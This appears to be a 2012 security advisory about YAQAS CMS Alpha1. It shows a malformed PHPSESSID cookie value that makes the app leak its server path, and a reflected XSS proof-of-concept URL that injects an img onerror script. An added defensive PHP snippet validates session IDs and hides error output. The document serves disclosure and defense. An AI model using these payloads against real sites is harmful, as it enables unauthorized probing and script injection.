# TITLE ....... # Yaqas CMS Alpha1 Information Disclosure #
# DATE ........ # 25.03.2012 #
# AUTHOR ...... # http://hauntit.blogspot.com #
# SOFT LINK ... # YAQAS - Yet Another Question & Answer System @ google #
# SOFT COPYRIGHT # "(C) 2012 Karpouzas George" (*) #
# VERSION ..... # Alpha1 #
# TESTED ON ... # LAMP #
# ..................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
# 2.1 information disclosure
If we send PHPSESSID = %3b)() , the error output (possibly visible only in the page source) looks like this:
"Warning: session_start():
The session id is too long or contains illegal characters, valid characters
are a-z, A-Z, 0-9 and '-,' in /your/www/yaqas-release-alpha1/src/lib/session.php on line 32"
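A defensive check for the session handling described in 2.1, added here as an example and not taken from the YAQAS code: it validates the incoming PHPSESSID cookie against the character set PHP itself accepts (the rule quoted in the warning above) before session_start() runs, and keeps warnings out of the response so the server path is not leaked. The length bound and the log message are assumptions.

```php
<?php
// Added defensive example (not part of the YAQAS code base).

// Never echo PHP warnings to the client in production; log them instead.
// With display_errors on, the warning quoted above reveals the full path
// /your/www/yaqas-release-alpha1/src/lib/session.php to the visitor.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Reject session ids the server did not create itself (PHP >= 5.5.2).
ini_set('session.use_strict_mode', '1');

/**
 * True if $id uses only the characters PHP accepts in a session id:
 * a-z, A-Z, 0-9, '-' and ','. The upper length bound (128) is an
 * assumption chosen to bound the input, not a PHP constant.
 */
function is_well_formed_session_id($id)
{
    return is_string($id)
        && preg_match('/^[a-zA-Z0-9,-]{1,128}$/', $id) === 1;
}

$name = session_name(); // defaults to "PHPSESSID"

if (isset($_COOKIE[$name]) && !is_well_formed_session_id($_COOKIE[$name])) {
    // A malformed session id (e.g. the "%3b)()" value from the advisory) is
    // worth noticing in monitoring, so record it before discarding it.
    error_log('Malformed session id rejected from ' . $_SERVER['REMOTE_ADDR']);

    // session_start() takes the id from $_COOKIE, so removing the entry makes
    // PHP issue a fresh id instead of emitting the "too long or contains
    // illegal characters" warning. Expire the bad cookie client-side as well.
    unset($_COOKIE[$name]);
    setcookie($name, '', time() - 3600, '/');
}

session_start();
```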
# 2.2 btw:
http://yaqas-release-alpha1/src/index.php?q=%29%2f*%20]]%3E%20*%2f%3Cimg%20src%3dxxx%20onerror%3dalert%28123123123123%29%3E&type=nhf
#............................................#
# 3. Where is bug :)
#............................................#
# 4. More...
- (*) from license: YAQAS - Yet Another Question & Answer System // Copyright (C) 2012 Karpouzas George
- http://www.google.com
- http://hauntit.blogspot.com
- http://portswigger.net
#............................................#
# Ask me about new projects...
#
# Best regards
#